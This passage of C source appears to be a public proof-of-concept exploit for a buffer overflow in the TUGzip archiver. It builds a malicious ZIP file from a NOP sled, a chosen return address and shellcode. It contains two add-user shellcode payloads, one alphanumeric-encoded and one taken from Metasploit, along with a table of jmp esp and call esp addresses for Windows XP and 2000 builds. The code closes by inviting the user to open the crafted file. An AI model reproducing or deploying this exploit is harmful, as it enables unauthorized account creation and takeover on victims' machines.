"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x2E\x74\x78\x74\x50\x4B\x05\x06\x00\x00\x00\x00"  
"\x01\x00\x01\x00\x42\x08\x00\x00\x32\x08\x00\x00";  
  
  
char shellcode_1[]=  
// Skylined's alpha2 unicode decoder  
//Un-encoded ADD USER shellcode  
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABA"  
"BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"  
// Encoded opcodes  
"ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDKoDTKKQXnnQ7P4Y4lU4upptm7i1WZLM"  
"kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBkMLRkzajKQyQLmTM45sNQUpotRkmplp"  
"tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMlaOlqhvqPPVriJXCS5pCKNpOxJO8Nk0"  
"C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRUpsqUPrmP%skp%s"  
"mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQotPmoyPn1YT3ptT2aQPtpo1bBSkp%s"  
"MPNOOQa4oTkPA";  
//ADD USER shellcode TNX to metasploit   
char shellcode_2[]=  
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"  
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"  
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"  
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"  
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"  
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"  
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"  
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"  
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"  
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"  
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"  
"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"  
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"  
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"  
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"  
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"  
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"  
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"  
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"  
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"  
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"  
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";  
  
struct addresses  
{ char *platform;  
unsigned long addr;   
}   
targets[]=  
{   
  
{ "[*]Microsoft Windows XP 5.1.1.0 SP1 (IA32)English(jmp esp)",0x778eadcf },  
{ "[*]Microsoft Windows Pro sp3 English (call esp)",0x7C8369F0 },  
{ "[*]Microsoft Windows Pro sp3 English (jmp esp)",0x7C86467B },  
{ "[*]Windows XP 5.1.2.0 SP2 (IA32) English (jmp esp)",0x7d184de7 },  
{ "[*]Windows XP 5.1.2.0 SP2 (IA32) German (jmp esp)",0x77d85197 },  
{ "[*]Windows 2000 5.0.1.0 SP1 (IA32) English (jmp esp)",0x69952208 },  
{ "[*]Crash the program",0x58585858 },  
{NULL }  
};   
  
int main(int argc,char *argv[])  
{ FILE *h;  
char *buffer;  
buffer=(char *)malloc(sizeof(file_1)+sizeof(file_2));  
unsigned int offset=0;  
int number;   
unsigned int retaddress=targets[atoi(argv[2])].addr;   
if(argc<2)   
{ printf("# \tChose your Platform #\n");   
for(int i=0;targets[i].platform;i++)  
printf("%d \t\t %s\n",i,targets[i].platform);  
printf("\tUsage is:\n");  
printf(argv[0]);  
printf(".exe ");  
printf("filename.zip ");  
printf("platform\n");   
printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");   
  
system("color 02");  
Sleep(2000);  
return 0;   
}  
  
if((h=fopen(argv[1],"wb"))==NULL)  
{ printf("error\n");   
exit(0);  
}  
  
memcpy(buffer,file_1,sizeof(file_1)); offset=sizeof(file_1);   
memcpy(buffer+offset-1,file_2,sizeof(file_2)); offset=OFFSET;  
memcpy(buffer+offset,&retaddress,4); offset=0; offset=NOP;  
memset(buffer+offset,0x90,20);  
  
printf("#___________________________________________________________________________#\n");  
printf("Now chose your shellcode \n");  
printf("Press [1] for Alphanumeric shellcode\n");  
printf("Press [2] for NonAphanumeric shellcode\n");  
printf("#___________________________________________________________________________#\n");  
  
scanf("%d",&number);   
switch(number)  
{ case 1:  
offset=shellcode_offset;  
memcpy(buffer+offset,shellcode_1,sizeof(shellcode_1));   
case 2:  
offset=shellcode_offset;  
memcpy(buffer+offset,shellcode_2,sizeof(shellcode_2));   
}   
fwrite(buffer,1,sizeof(file_1)+sizeof(file_2),h);   
printf("Building file ...\n");  
printf("Done ! Open with TUGzip and see what happens :) \n");  
printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");   
fclose(h);  
free(buffer);  
return 0;   
}  
  
`